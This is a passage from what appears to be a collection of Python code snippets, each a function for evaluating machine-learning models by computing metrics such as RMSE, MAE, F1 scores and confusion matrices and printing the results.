(max_eval_batches and\n num_eval_batches >= max_eval_batches):\n break\n\n except tf.errors.OutOfRangeError:\n pass\n\n # Evaluate\n scores = None\n if calculate_scores:\n scores = evaluation_fn(\n all_predictions,\n all_fetched_data[\"seq_1\"], # Should be empty\n all_fetched_data[\"seq_2\"], # Should be empty\n all_fetched_data[\"target\"])\n\n if write_results:\n _write_results_to_csv(\n all_logits,\n all_predictions,\n all_fetched_data,\n output_dir=os.path.join(\n self._logdir, RESULTS_CSV_FNAME))\n\n return len(all_predictions), scores", "def evaluate_model(model_name, y_true, y_pred):\n\n # Calculate performance metrics\n rmse_eval = evaluate_rmse(y_true, y_pred)\n mae_eval = evaluate_mae(y_true, y_pred) \n r2_eval = evaluate_r2(y_true, y_pred)\n\n # Print results\n print_evaluation(model_name, mae_eval, rmse_eval, r2_eval)", "def main(cfg: DictConfig):\n result, evaluation_metric = evaluate(cfg)\n print(result)\n print(f\"Validation dice coefficient: {result[evaluation_metric]}\")", "def evaluate(self, X_test, y_test):\n self.run(self)\n self.y_pred = self.pipeline.predict(X_test)\n self.rmse = compute_rmse(self.y_pred, y_test)", "def mgcEval(self):\n import numpy as np\n def report_to_df(report):\n\n \"\"\"\n function to convert classification report to dataframe (for visualisation plot)\n \"\"\"\n\n report = re.sub(r\" +\", \" \", report).replace(\"avg / total\", \"avg/total\").replace(\"\\n \", \"\\n\")\n # update this due to sklearn classification report output change\n report = re.sub(r\" +\", \" \", report).replace(\"micro avg\", \"micro_avg\").replace(\"macro avg\", \"macro_avg\").replace(\"weighted avg\", \"weighted_avg\").replace(\"\\n \", \"\\n\")\n report_df = pd.read_csv(StringIO(\"Classes\" + report), sep=' ', index_col=0) \n return(report_df)\n \n #txt report to df\n class_rpttop1 = classification_report(self.y_true, self.y_pred)\n df_report = report_to_df(class_rpttop1)\n\n df_report = df_report.iloc[:self.nb_classes, :].copy()\n df_report.index = df_report.index.astype(int)\n \n\n # classifier prediction metrics\n def classMetrics(averagex):\n precision, recall, fscore, support = score(self.y_true, self.y_pred, average=averagex)\n \n return(\n print(''), \n print('-------------{0:}--------------------'.format(averagex)), \n print('precision: {0:.4f}'.format(precision)),\n print('recall: {0:.4f}'.format(recall)),\n print('fscore: {0:.4f}'.format(fscore)),\n print(''),\n print('kappa score: {0:.4f}'.format(cohen_kappa_score(self.y_true, self.y_pred))),\n print('accuracy score: {0:.4f}'.format(accuracy_score(self.y_true, self.y_pred))))\n \n def predSamp():\n\n correct = np.nonzero(self.y_pred==self.y_true)[0]\n incorrect = np.nonzero(self.y_pred!=self.y_true)[0]\n\n # quick check of the number of correct prediction from validation set\n print(\"\")\n print(\"correct/total = {0: .4f}\".format(len(correct)/(len(correct)+len(incorrect))))\n print(\"total correct sample = {0: .0f}\".format(len(correct)))\n print('------------------------------------------------------------------')\n \n def classReport():\n print('----------------------------- Classfication Report -------------------------------')\n print(classification_report(pd.Series(self.y_true).map(self.dict_label), pd.Series(self.y_pred).map(self.dict_label)))\n \n self.class_rpt = pd.concat([pd.DataFrame(pd.Series(df_report.index.tolist()).map(self.dict_label), columns = ['label']), df_report], axis = 1)\n \n self.classMetricsMac = classMetrics(\"macro\")\n self.classMetricsMic = classMetrics(\"micro\")\n self.predSample = predSamp()\n self.class_rptTop1 = classReport()\n \n return self", "def train_and_evaluate(name, model, train, test, evaluation, final_eval, output_dir):\n\n print(\"---\" * 5)\n print(\"Running pipeline for {}\".format(name))\n\n plot_dir = os.path.join(output_dir, \"plots\")\n\n pipeline = make_pipeline(model)\n\n X_train, y_train = train.drop(\n [\"PM10\"], axis=1).values, train[\"PM10\"].values\n X_test, y_test = test.drop([\"PM10\"], axis=1).values, test[\"PM10\"].values\n X_eval, y_eval = evaluation.drop(\n [\"PM10\"], axis=1).values, evaluation[\"PM10\"].values\n X_final, y_final = final_eval.drop(\n [\"PM10\"], axis=1), final_eval[\"PM10\"].values\n\n # first round - fit on train, predict on test\n print(\"Fitting pipeline on train data\")\n pipeline.fit(X_train, y_train)\n yhat = pipeline.predict(X_test)\n mae = mean_absolute_error(y_test, yhat)\n print(\"MAE: {}\".format(mae))\n plot_predictions(\n y_test, yhat, title=\"{} - Predicted vs. Actual on Test\".format(name), output_dir=plot_dir)\n\n # second round - fit on train + test, predict on evaluation\n X_train = np.concatenate([X_train, X_test])\n y_train = np.concatenate([y_train, y_test])\n print(\"Fitting pipeline on train + test data\")\n pipeline.fit(X_train,y_train)\n yhat = pipeline.predict(X_eval)\n mae = mean_absolute_error(y_eval,yhat)\n print(\"MAE: {}\".format(mae))\n plot_predictions(y_eval,yhat,title=\"{} - Predicted vs. Actual on Evaluation\".format(name),output_dir=plot_dir)\n\n # final round - fit on last X hours, by which the actual score will be measured\n X_train = np.concatenate([X_train, X_eval])\n y_train = np.concatenate([y_train, y_eval])\n print(\"Fitting pipeline on all \\\"all available data\\\"\")\n pipeline.fit(X_train, y_train)\n yhat = pipeline.predict(X_final)\n mae = mean_absolute_error(y_final, yhat)\n print(\"MAE: {}\".format(mae))\n plot_predictions(\n y_final, yhat, title=\"{} - Predicted vs. Actual\".format(name), output_dir=plot_dir)\n\n # save the model\n joblib.dump(model, os.path.join(\n output_dir, \"models\", \"{}.joblib\".format(name)))\n\n return yhat, mae", "def evaluate(network: nn.Module, data: DataLoader, metric: callable) -> list:\n error_list = []\n with torch.no_grad():\n for x, y in data:\n \n prediction = network.forward(x)\n error_list.append(metric(prediction, y))\n \n return torch.tensor(error_list)", "def evaluate(self,\n data: Union[\"SparkXShards\",\n \"SparkDataFrame\",\n \"TFDataset\",\n \"ray.data.Dataset\",\n Callable],\n batch_size: int=32,\n num_steps: Optional[int]=None,\n verbose: Union[str, int]=1,\n sample_weight: Optional[\"np.ndarray\"]=None,\n callbacks: Optional[List[\"Callback\"]]=None,\n data_config: Optional[Dict]=None,\n feature_cols: Optional[List[str]]=None,\n label_cols: Optional[List[str]]=None) -> Dict:\n if not isinstance(data, types.FunctionType):\n invalidInputError(isinstance(batch_size, int) and batch_size > 0,\n \"batch_size should be a positive integer\")\n else:\n # batch_size can be None if the return of data_creator already generates batches\n if batch_size:\n invalidInputError(isinstance(batch_size, int) and batch_size > 0,\n \"batch_size should be a positive integer\")\n # Use the local batch size for each worker to convert to XShards\n if batch_size:\n local_batch_size = batch_size // self.num_workers\n if local_batch_size <= 0:\n local_batch_size = 1\n else:\n local_batch_size = None\n logger.info(\"Starting validation step.\")\n params = dict(\n batch_size=batch_size,\n verbose=verbose,\n sample_weight=sample_weight,\n steps=num_steps,\n callbacks=callbacks,\n data_config=data_config,\n )\n from bigdl.orca.data import SparkXShards\n from bigdl.orca.data.tf.data import Dataset\n from bigdl.orca.data.tf.tf2_data import TF2Dataset\n\n data, _ = maybe_dataframe_to_xshards(data,\n validation_data=None,\n feature_cols=feature_cols,\n label_cols=label_cols,\n mode=\"evaluate\",\n num_workers=self.num_workers,\n accept_str_col=True,\n shard_size=local_batch_size)\n\n if isinstance(data, SparkXShards):\n # Make sure each worker can get at least one data partition\n if data.num_partitions() < self.num_workers:\n data = data.repartition(self.num_workers)\n if data._get_class_name() == 'pandas.core.frame.DataFrame':\n data = process_xshards_of_pandas_dataframe(data, feature_cols, label_cols)\n ray_xshards = RayXShards.from_spark_xshards(data) # type:ignore\n worker_stats = self._evaluate_ray_xshards(ray_xshards, params)\n elif isinstance(data, Dataset):\n ray_xshards = TF2Dataset(data).get_ray_xshards(self.num_workers)\n worker_stats = self._evaluate_ray_xshards(ray_xshards, params)\n elif isinstance(data, ray.data.Dataset):\n shards = data.split(n=self.num_workers, locality_hints=self.remote_workers)\n\n remote_worker_stats = []\n for shard, worker in zip(shards, self.remote_workers):\n params[\"data_creator\"] = self.process_ray_dataset(shard,\n label_cols,\n feature_cols,\n data_config)\n remote_worker_stats.append(worker.validate.remote(**params))\n worker_stats = ray.get(remote_worker_stats)\n else: # data_creator functions; should return Iter or DataLoader\n params[\"data_creator\"] = data # type:ignore\n params_list = [params] * self.num_workers\n\n worker_stats = ray.get([w.validate.remote(**params_list[i])\n for i, w in enumerate(self.remote_workers)])\n stats = worker_stats[0].copy()\n return stats", "def post_eval_callout(outdir, X_data, Y_pred, E_pred, N_SP_pred, Y_data=None , tail=None) -> None:\n \n error = np.sum((Y_pred[:,0:2] - Y_data[:, 0:2])**2, axis = 1)\n error = np.reshape(error, (error.shape[0],1))\n I1, _, E = compute_l2_norm(error, X_data[:,1:3], outdim=2)\n\n data = {}\n data['E_init'] = E_pred[0]\n data['E_PI'] = E_pred[1]\n data['N_SP'] = int(N_SP_pred)\n data['E_ref'] = np.sqrt(I1+ E)\n\n print(os.path.join(outdir, \"run_\" + get_prefix() +tail[:-4] + \"_error.json\"))\n out_file = open( os.path.join(outdir,\"..\", \"run_\"+get_prefix()+\"values\", \"run_\" + get_prefix() +tail[:-4] + \"_error.json\"), \"w\")\n json.dump(data, out_file, indent=4)\n out_file.close()\n \n return", "def evaluate(self) -> Dict[str, float]:\n eval_dataloader = self.get_eval_dataloader()\n\n output = self._prediction_loop(eval_dataloader, description=\"Evaluation\")\n return output.metrics", "def evaluate_model():\n\n print '\\n\\tevaluate result'\n os.system('./conlleval.pl -d \\'\\t\\' < ' + encoded_test + ' >> ' + result_file)\n print '\\t--done\\n'", "def test_run_experiment_lr_eval_with_object(self):\n source = \"lr-eval-object\"\n experiment_id = \"lr_eval_object\"\n\n configdir = join(rsmtool_test_dir, \"data\", \"experiments\", source)\n\n config_dict = {\n \"predictions_file\": \"../../files/predictions_scaled_with_subgroups.csv\",\n \"system_score_column\": \"score\",\n \"description\": \"An evaluation of LinearRegression predictions.\",\n \"human_score_column\": \"h1\",\n \"id_column\": \"id\",\n \"experiment_id\": \"lr_eval_object\",\n \"subgroups\": \"QUESTION\",\n \"scale_with\": \"asis\",\n \"trim_min\": 1,\n \"trim_max\": 6,\n }\n\n config_obj = Configuration(config_dict, context=\"rsmeval\", configdir=configdir)\n\n check_run_evaluation(source, experiment_id, config_obj_or_dict=config_obj)", "def evaluate_model():\n\n # Get the processed data (in proper format to evaluate the NER model)\n data = get_json_from_file_path(PROCESSED_DATA_PATH)\n # Split the dataset for training and test as we did for training\n train_data, test_data = train_test_split(data, train_size=0.7, \n random_state=4)\n\n # Load the model trained\n try:\n ner_model = spacy.load(OUTPUT_MODEL_PATH)\n except Exception as err:\n msg = f'Could not load the model. Error: {err}'\n raise Exception(msg)\n\n # Compute evaluation scores\n print('Computing metrics...')\n scores = evaluate(ner_model, test_data)\n # General metrics of the model\n f_score = scores.get('ents_f')\n precision = scores.get('ents_p')\n recall = scores.get('ents_r')\n print('\\nScoring:')\n print(f'F-score: {f_score}')\n print(f'Precision: {precision}')\n print(f'Recall: {recall}')\n\n # Get the specific scores for each entity \n scores_per_entity = scores.get('ents_per_type')\n # Get the F-score of the entities\n f_scores_of_entities = []\n for entity_scores in scores_per_entity.values():\n f_scores_of_entities.append(entity_scores['f'])\n # Compute the macro averaged F-score\n macro_avg_f_score = sum(f_scores_of_entities)/len(f_scores_of_entities)\n print(f'Macro averaged F-score: {macro_avg_f_score}')\n \n print('\\nScores per entity;')\n print('{:<15} {:<10} {:<10} {:<10}'.format('Entity','F-score','Precision','Recall'))\n for key, value in scores_per_entity.items():\n entity = key\n f, p, r = value['f'], value['p'], value['r']\n print('{:<15} {:<10.2f} {:<10.2f} {:<10.2f}'.format(entity, f, p, r))", "def runEval(self, cmdText, varName, rhs):\n\n _globals= self._globals\n\n self.logPyCode= '# Error: ' + str(varName) + '=' + str(rhs)\n try:\n rhs= self.pyFromVec(rhs)\n except:\n print(\"Error: runEval at pyFromVec: \" + rhs)\n\n try:\n rhs= self.pyFromEng(rhs)\n except:\n print(\"Error: runEval at pyFromEng: \" + rhs)\n\n saved_handler = np.seterrcall(self.err_handler)\n save_err = np.seterr(divide='call', over='call', under='call',\n invalid='call')\n\n if varName:\n self.logPyCode= str(varName) + '=' + str(rhs)\n else:\n self.logPyCode= str(rhs)\n\n try:\n result= eval(str(rhs), _globals, _globals)\n _globals[str(varName)]= result\n success= True\n except:\n self.logCommandRHS= '# Error: ' + self.logPyCode\n result= 0\n success= False\n np.seterrcall(saved_handler)\n return result, success", "def do_system_evaluation(dataset, result_path, dataset_evaluation_mode='folds'):\n\n # Set warnings off, sklearn metrics will trigger warning for classes without\n # predicted samples in F1-scoring. This is just to keep printing clean.\n warnings.simplefilter(\"ignore\")\n\n overall_metrics_per_scene = {}\n\n for scene_id, scene_label in enumerate(dataset.scene_labels):\n if scene_label not in overall_metrics_per_scene:\n overall_metrics_per_scene[scene_label] = {}\n\n dcase2016_segment_based_metric = DCASE2016_EventDetection_SegmentBasedMetrics(class_list=dataset.event_labels(scene_label=scene_label))\n dcase2016_event_based_metric = DCASE2016_EventDetection_EventBasedMetrics(class_list=dataset.event_labels(scene_label=scene_label))\n\n for fold in dataset.folds(mode=dataset_evaluation_mode):\n results = []\n result_filename = get_result_filename(fold=fold, scene_label=scene_label, path=result_path)\n\n if os.path.isfile(result_filename):\n with open(result_filename, 'rt') as f:\n for row in csv.reader(f, delimiter='\\t'):\n results.append(row)\n else:\n raise IOError(\"Result file not found [%s]\" % result_filename)\n\n for file_id, item in enumerate(dataset.test(fold, scene_label=scene_label)):\n current_file_results = []\n for result_line in results:\n if len(result_line) != 0 and result_line[0] == dataset.absolute_to_relative(item['file']):\n current_file_results.append(\n {'file': result_line[0],\n 'event_onset': float(result_line[1]),\n 'event_offset': float(result_line[2]),\n 'event_label': result_line[3].rstrip()\n }\n )\n meta = dataset.file_meta(dataset.absolute_to_relative(item['file']))\n\n dcase2016_segment_based_metric.evaluate(system_output=current_file_results, annotated_ground_truth=meta)\n dcase2016_event_based_metric.evaluate(system_output=current_file_results, annotated_ground_truth=meta)\n\n overall_metrics_per_scene[scene_label]['segment_based_metrics'] = dcase2016_segment_based_metric.results()\n overall_metrics_per_scene[scene_label]['event_based_metrics'] = dcase2016_event_based_metric.results()\n\n print \" Evaluation over %d folds\" % dataset.fold_count\n print \" \"\n print \" Results per scene \"\n print \" {:18s} | {:5s} | | {:39s} \".format('', 'Main', 'Secondary metrics')\n print \" {:18s} | {:5s} | | {:38s} | {:14s} | {:14s} | {:14s} \".format('', '', 'Seg/Overall','Seg/Class', 'Event/Overall','Event/Class')\n print \" {:18s} | {:5s} | | {:6s} : {:5s} : {:5s} : {:5s} : {:5s} | {:6s} : {:5s} | {:6s} : {:5s} | {:6s} : {:5s} |\".format('Scene', 'ER', 'F1', 'ER', 'ER/S', 'ER/D', 'ER/I', 'F1', 'ER', 'F1', 'ER', 'F1', 'ER')\n print \" -------------------+-------+ +--------+-------+-------+-------+-------+--------+-------+--------+-------+--------+-------+\"\n averages = {\n 'segment_based_metrics': {\n 'overall': {\n 'ER': [],\n 'F': [],\n },\n 'class_wise_average': {\n 'ER': [],\n 'F': [],\n }\n },\n 'event_based_metrics': {\n 'overall': {\n 'ER': [],\n 'F': [],\n },\n 'class_wise_average': {\n 'ER': [],\n 'F': [],\n }\n },\n }\n for scene_id, scene_label in enumerate(dataset.scene_labels):\n print \" {:18s} | {:5.2f} | | {:4.1f} % : {:5.2f} : {:5.2f} : {:5.2f} : {:5.2f} | {:4.1f} % : {:5.2f} | {:4.1f} % : {:5.2f} | {:4.1f} % : {:5.2f} |\".format(scene_label,\n overall_metrics_per_scene[scene_label]['segment_based_metrics']['overall']['ER'],\n overall_metrics_per_scene[scene_label]['segment_based_metrics']['overall']['F'] * 100,\n overall_metrics_per_scene[scene_label]['segment_based_metrics']['overall']['ER'],\n overall_metrics_per_scene[scene_label]['segment_based_metrics']['overall']['S'],\n overall_metrics_per_scene[scene_label]['segment_based_metrics']['overall']['D'],\n overall_metrics_per_scene[scene_label]['segment_based_metrics']['overall']['I'],\n overall_metrics_per_scene[scene_label]['segment_based_metrics']['class_wise_average']['F']*100,\n overall_metrics_per_scene[scene_label]['segment_based_metrics']['class_wise_average']['ER'],\n overall_metrics_per_scene[scene_label]['event_based_metrics']['overall']['F']*100,\n overall_metrics_per_scene[scene_label]['event_based_metrics']['overall']['ER'],\n overall_metrics_per_scene[scene_label]['event_based_metrics']['class_wise_average']['F']*100,\n overall_metrics_per_scene[scene_label]['event_based_metrics']['class_wise_average']['ER'],\n )\n averages['segment_based_metrics']['overall']['ER'].append(overall_metrics_per_scene[scene_label]['segment_based_metrics']['overall']['ER'])\n averages['segment_based_metrics']['overall']['F'].append(overall_metrics_per_scene[scene_label]['segment_based_metrics']['overall']['F'])\n averages['segment_based_metrics']['class_wise_average']['ER'].append(overall_metrics_per_scene[scene_label]['segment_based_metrics']['class_wise_average']['ER'])\n averages['segment_based_metrics']['class_wise_average']['F'].append(overall_metrics_per_scene[scene_label]['segment_based_metrics']['class_wise_average']['F'])\n averages['event_based_metrics']['overall']['ER'].append(overall_metrics_per_scene[scene_label]['event_based_metrics']['overall']['ER'])\n averages['event_based_metrics']['overall']['F'].append(overall_metrics_per_scene[scene_label]['event_based_metrics']['overall']['F'])\n averages['event_based_metrics']['class_wise_average']['ER'].append(overall_metrics_per_scene[scene_label]['event_based_metrics']['class_wise_average']['ER'])\n averages['event_based_metrics']['class_wise_average']['F'].append(overall_metrics_per_scene[scene_label]['event_based_metrics']['class_wise_average']['F'])\n\n print \" -------------------+-------+ +--------+-------+-------+-------+-------+--------+-------+--------+-------+--------+-------+\"\n print \" {:18s} | {:5.2f} | | {:4.1f} % : {:5.2f} : {:21s} | {:4.1f} % : {:5.2f} | {:4.1f} % : {:5.2f} | {:4.1f} % : {:5.2f} |\".format('Average',\n numpy.mean(averages['segment_based_metrics']['overall']['ER']),\n numpy.mean(averages['segment_based_metrics']['overall']['F'])*100,\n numpy.mean(averages['segment_based_metrics']['overall']['ER']),\n ' ',\n numpy.mean(averages['segment_based_metrics']['class_wise_average']['F'])*100,\n numpy.mean(averages['segment_based_metrics']['class_wise_average']['ER']),\n numpy.mean(averages['event_based_metrics']['overall']['F'])*100,\n numpy.mean(averages['event_based_metrics']['overall']['ER']),\n numpy.mean(averages['event_based_metrics']['class_wise_average']['F'])*100,\n numpy.mean(averages['event_based_metrics']['class_wise_average']['ER']),\n )\n\n print \" \"\n # Restore warnings to default settings\n warnings.simplefilter(\"default\")\n print \" Results per events \"\n\n for scene_id, scene_label in enumerate(dataset.scene_labels):\n print \" \"\n print \" \"+scene_label.upper()\n print \" {:20s} | {:30s} | | {:15s} \".format('', 'Segment-based', 'Event-based')\n print \" {:20s} | {:5s} : {:5s} : {:6s} : {:5s} | | {:5s} : {:5s} : {:6s} : {:5s} |\".format('Event', 'Nref', 'Nsys', 'F1', 'ER', 'Nref', 'Nsys', 'F1', 'ER')\n print \" ---------------------+-------+-------+--------+-------+ +-------+-------+--------+-------+\"\n seg_Nref = 0\n seg_Nsys = 0\n\n event_Nref = 0\n event_Nsys = 0\n for event_label in sorted(overall_metrics_per_scene[scene_label]['segment_based_metrics']['class_wise']):\n print \" {:20s} | {:5d} : {:5d} : {:4.1f} % : {:5.2f} | | {:5d} : {:5d} : {:4.1f} % : {:5.2f} |\".format(event_label,\n int(overall_metrics_per_scene[scene_label]['segment_based_metrics']['class_wise'][event_label]['Nref']),\n int(overall_metrics_per_scene[scene_label]['segment_based_metrics']['class_wise'][event_label]['Nsys']),\n overall_metrics_per_scene[scene_label]['segment_based_metrics']['class_wise'][event_label]['F']*100,\n overall_metrics_per_scene[scene_label]['segment_based_metrics']['class_wise'][event_label]['ER'],\n int(overall_metrics_per_scene[scene_label]['event_based_metrics']['class_wise'][event_label]['Nref']),\n int(overall_metrics_per_scene[scene_label]['event_based_metrics']['class_wise'][event_label]['Nsys']),\n overall_metrics_per_scene[scene_label]['event_based_metrics']['class_wise'][event_label]['F']*100,\n overall_metrics_per_scene[scene_label]['event_based_metrics']['class_wise'][event_label]['ER'])\n seg_Nref += int(overall_metrics_per_scene[scene_label]['segment_based_metrics']['class_wise'][event_label]['Nref'])\n seg_Nsys += int(overall_metrics_per_scene[scene_label]['segment_based_metrics']['class_wise'][event_label]['Nsys'])\n\n event_Nref += int(overall_metrics_per_scene[scene_label]['event_based_metrics']['class_wise'][event_label]['Nref'])\n event_Nsys += int(overall_metrics_per_scene[scene_label]['event_based_metrics']['class_wise'][event_label]['Nsys'])\n print \" ---------------------+-------+-------+--------+-------+ +-------+-------+--------+-------+\"\n print \" {:20s} | {:5d} : {:5d} : {:14s} | | {:5d} : {:5d} : {:14s} |\".format('Sum',\n seg_Nref,\n seg_Nsys,\n '',\n event_Nref,\n event_Nsys,\n '')\n print \" {:20s} | {:5s} {:5s} : {:4.1f} % : {:5.2f} | | {:5s} {:5s} : {:4.1f} % : {:5.2f} |\".format('Average',\n '', '',\n overall_metrics_per_scene[scene_label]['segment_based_metrics']['class_wise_average']['F']*100,\n overall_metrics_per_scene[scene_label]['segment_based_metrics']['class_wise_average']['ER'],\n '', '',\n overall_metrics_per_scene[scene_label]['event_based_metrics']['class_wise_average']['F']*100,\n overall_metrics_per_scene[scene_label]['event_based_metrics']['class_wise_average']['ER'])\n print \" \"", "def eval(approach, datapath, incremental):\n param_grid = approaches[approach] if not incremental else params[approach]\n report_path = evaluate(datapath,\n approach=approach,\n param_grid=param_grid,\n incremental=incremental)\n c.echo('Report compiled at {0}.'.format(report_path))", "def evaluate(pred, ground_truth, target, count_to_level = False, Y_name = None, thresholds = None, print_metrics=True):\n \n if target == 'count':\n \n # fill NaNs with zeroes\n pred = pred.fillna(method = \"ffill\")\n pred = pred.fillna(method = \"bfill\")\n ground_truth = ground_truth.fillna(method = \"ffill\")\n ground_truth = ground_truth.fillna(method = \"bfill\")\n \n # Set negative predictions to zero\n pred[pred < 0] = 0\n ground_truth[ground_truth < 0] = 0\n \n # Calculate error metrics\n rmse = mean_squared_error(ground_truth, pred, squared=False)\n mae = mean_absolute_error(ground_truth, pred)\n \n # Calculate error metrics only for crowded moments (p75) \n busy = np.percentile(ground_truth, 75)\n ground_truth_busy = ground_truth[ground_truth > busy].dropna()\n pred_busy = pred[ground_truth > busy].dropna()\n rmse_busy = mean_squared_error(ground_truth_busy, pred_busy, squared=False)\n mae_busy = mean_absolute_error(ground_truth_busy, pred_busy)\n \n # Store error metrics in dict\n error_metrics = dict({'rmse': rmse, 'rmse_busy': rmse_busy, 'mae': mae, 'mae_busy': mae_busy})\n \n if print_metrics:\n print(f\"Root mean squared error: {rmse.round(1)}\")\n print(f\"Root mean squared error (crowded): {rmse_busy.round(1)}\")\n print(f\"Mean absolute error: {mae.round(1)}\")\n print(f\"Mean absolute error (crowded): {mae_busy.round(1)}\")\n \n if count_to_level:\n pred = get_crowd_levels(pred, Y_name, thresholds)\n ground_truth = get_crowd_levels(ground_truth, Y_name, thresholds)\n \n # Confusion matrix\n conf_mat = confusion_matrix(ground_truth, pred)\n \n error_metrics['conf_mat'] = conf_mat\n \n elif target == \"level\":\n \n # Set dtype to category\n pred = pred.astype('category')\n ground_truth = ground_truth.astype('category')\n \n # Forward fill NaNs\n pred = pred.fillna(method = \"ffill\")\n ground_truth = ground_truth.fillna(method = \"ffill\")\n \n # Confusion matrix\n conf_mat = confusion_matrix(ground_truth, pred)\n \n # Classification report (recall, precision, F1)\n class_report = classification_report(ground_truth, pred, output_dict = True)\n class_report = pd.DataFrame(class_report).transpose()\n \n error_metrics = dict({\"conf_mat\": conf_mat, \"class_report\": class_report})\n \n if print_metrics:\n print(f\"Confusion matrix: {conf_mat}\")\n print(f\"Classification report: {class_report}\")\n \n return error_metrics", "def evaluate(self, X_test, y_test):\n pipeline = run()\n y_pred = pipeline.predict(X_test)\n rmse = compute_rmse(y_pred, y_test)\n print(rmse)\n return rmse", "def evaluator(model, config, test_dir=None):\n shottype = config.shottype\n dataset = config.data_set\n seed = config.seed\n if test_dir is None:\n test_data_gen_dir, _, _ = _generator_dir(\n config=config, target_gen=\"test\", data_dir=None\n )\n if test_dir is not None:\n print(\"Evaluating directory: '{}'.\".format(test_dir))\n test_data_gen_dir, _, _ = _generator_dir(\n config=config, target_gen=\"test\", data_dir=test_dir\n )\n score = model.evaluate_generator(test_data_gen_dir)\n print(\n \"Test metrics: \"\n \"Loss: {:.4f}, \"\n \"Accuracy: {:.4f}, \"\n \"Top 3 accuracy: {:.4f}\".format(score[0], score[1], score[2])\n )\n return score", "def evaluate(self, params):\n model = self.train(params)\n Y_pred = model.predict(self.X_test)\n\n if self.dataset_type == PROBLEM.CLASSIFICATION:\n return {\n 'score': accuracy_score(self.Y_test, Y_pred),\n 'matrix': confusion_matrix(self.Y_test, Y_pred).tolist(),\n 'report': classification_report(self.Y_test, Y_pred,\n target_names=self.labels,\n zero_division=1)\n }\n else:\n return {\n 'max_error': max_error(self.Y_test, Y_pred),\n 'mae': mean_absolute_error(self.Y_test, Y_pred),\n 'mse': mean_squared_error(self.Y_test, Y_pred)\n }", "def run(self):\n logging.info('running experiment...')\n self._prepare()\n self._load_data()\n self._run()\n self._evaluate()\n self._summarise()\n return True", "def run_analyses(y_predict_train, y_train, y_predict, y_test):\n # calculate metrics\n _, training_error = output_error(y_predict_train, y_train)\n (precision, recall, f1, _), testing_error = output_error(y_predict, y_test)\n \n # print out metrics\n print 'Average Precision:', np.average(precision)\n print 'Average Recall:', np.average(recall)\n print 'Average F1:', np.average(f1)\n print 'Training Error:', training_error\n print 'Testing Error:', testing_error", "def print_evaluation(model_name, mae_eval, rmse_eval, r2_eval):\n\n print(model_name, \"rmse (Eval):\", rmse_eval)\n print(model_name, \"mae (Eval):\", mae_eval)\n print(model_name, \"r2 (Eval):\", r2_eval)", "def evaluate(dataset, predictions, nms_thresh, recall_metrics=(1,5), iou_metrics=(0.3,0.5,0.7)):\n dataset_name = dataset.__class__.__name__\n logger = logging.getLogger(\"tcn-vmr.inference\")\n logger.info(\"Performing {} evaluation (Size: {}).\".format(dataset_name, len(dataset)))\n \n num_recall_metrics, num_iou_metrics = len(recall_metrics), len(iou_metrics)\n table = [['Rank@{},mIoU@{}'.format(i,j) \\\n for i in recall_metrics for j in iou_metrics]]\n \n recall_metrics = torch.tensor(recall_metrics)\n iou_metrics = torch.tensor(iou_metrics)\n recall_x_iou = torch.zeros(num_recall_metrics, num_iou_metrics)\n\n num_clips = predictions[0].shape[-1]\n\n\n for idx, score2d in tqdm(enumerate(predictions)): \n duration = dataset.get_duration(idx)\n moment = dataset.get_moment(idx) \n\n candidates, scores = score2d_to_moments_scores(score2d, num_clips, duration)\n moments = nms(candidates, scores, topk=recall_metrics[-1], thresh=nms_thresh)\n\n for i, r in enumerate(recall_metrics):\n mious = iou(moments[:r], dataset.get_moment(idx))\n bools = mious[:,None].expand(r, num_iou_metrics) > iou_metrics\n recall_x_iou[i] += bools.any(dim=0)\n\n recall_x_iou /= len(predictions)\n\n table.append(['{:.02f}'.format(recall_x_iou[i][j]*100) \\\n for i in range(num_recall_metrics) for j in range(num_iou_metrics)])\n\n \n table = AsciiTable(table)\n for i in range(num_recall_metrics*num_iou_metrics):\n table.justify_columns[i] = 'center'\n\n logger.info('\\n' + table.table)", "def dependent_error_exp(data, weak_signal_data, num_weak_signal):\n\n w_model = train_weak_signals(data, weak_signal_data, num_weak_signal)\n\n training_data = data['training_data'][0].T\n training_labels = data['training_data'][1]\n val_data, val_labels = data['validation_data']\n val_data = val_data.T\n test_data = data['test_data'][0].T\n test_labels = data['test_data'][1]\n\n num_features, num_data_points = training_data.shape\n\n weak_signal_ub = w_model['error_bounds']\n weak_signal_probabilities = w_model['probabilities']\n weak_test_accuracy = w_model['test_accuracy']\n\n weights = np.zeros(num_features)\n\n print(\"Running tests...\")\n\n optimized_weights, ineq_constraint = train_all(val_data, weights, weak_signal_probabilities, weak_signal_ub, max_iter=5000)\n\n # calculate test probabilities\n test_probabilities = probability(test_data, optimized_weights)\n # calculate test accuracy\n test_accuracy = getModelAccuracy(test_probabilities, test_labels)\n\n print(\"\")\n print(\"+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\")\n print(\"Experiment %d\"%num_weak_signal)\n print(\"We trained %d learnable classifiers with %d weak signals\" %(1, num_weak_signal))\n print(\"The accuracy of the model on the test data is\", test_accuracy)\n print(\"The accuracy of weak signal(s) on the test data is\", weak_test_accuracy)\n print(\"\")\n\n # calculate ge criteria\n print(\"Running tests on ge criteria...\")\n model = ge_criterion_train(val_data.T, val_labels, weak_signal_probabilities, num_weak_signal)\n ge_test_accuracy = accuracy_score(test_labels, np.round(probability(test_data, model)))\n print(\"The accuracy of ge criteria on test data is\", ge_test_accuracy)\n print(\"+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\")\n\n # calculate baseline\n print(\"Running tests on the baselines...\")\n baselines = runBaselineTests(val_data, weak_signal_probabilities)\n b_test_accuracy = getWeakSignalAccuracy(test_data, test_labels, baselines)\n print(\"The accuracy of the baseline models on test data is\", b_test_accuracy)\n print(\"\")\n\n output = {}\n output['ALL'] = test_accuracy\n output['WS'] = w_model['test_accuracy'][-1]\n output['GE'] = ge_test_accuracy\n output['AVG'] = b_test_accuracy[-1]\n\n return output", "def evaluate(model, test_files):\n print(\"Running predictions.\")\n models = load_model(model)\n predictions = predict(models, test_files)\n\n # # write predictions to file\n # write_predictions(\"evaluate_out.json\",predictions)\n evaluate_individual(predictions, test_files, models)\n evaluate_overall(predictions)", "def print_eval(trainset, testset, exptypes=EXPTYPES, semantic=False, savemodels=False, loadmodels=False, deprep=False, externals=True, predict=True):\n system_pairs = []\n print \"== cleaning lsts ==\"\n cleanupnonespanexpressions(testset)\n cleanholdercandidates(testset)\n cleanholders(testset)\n cleanupnonespanexpressions(trainset)\n cleanholdercandidates(trainset)\n cleanholders(trainset)\n \n print \"== 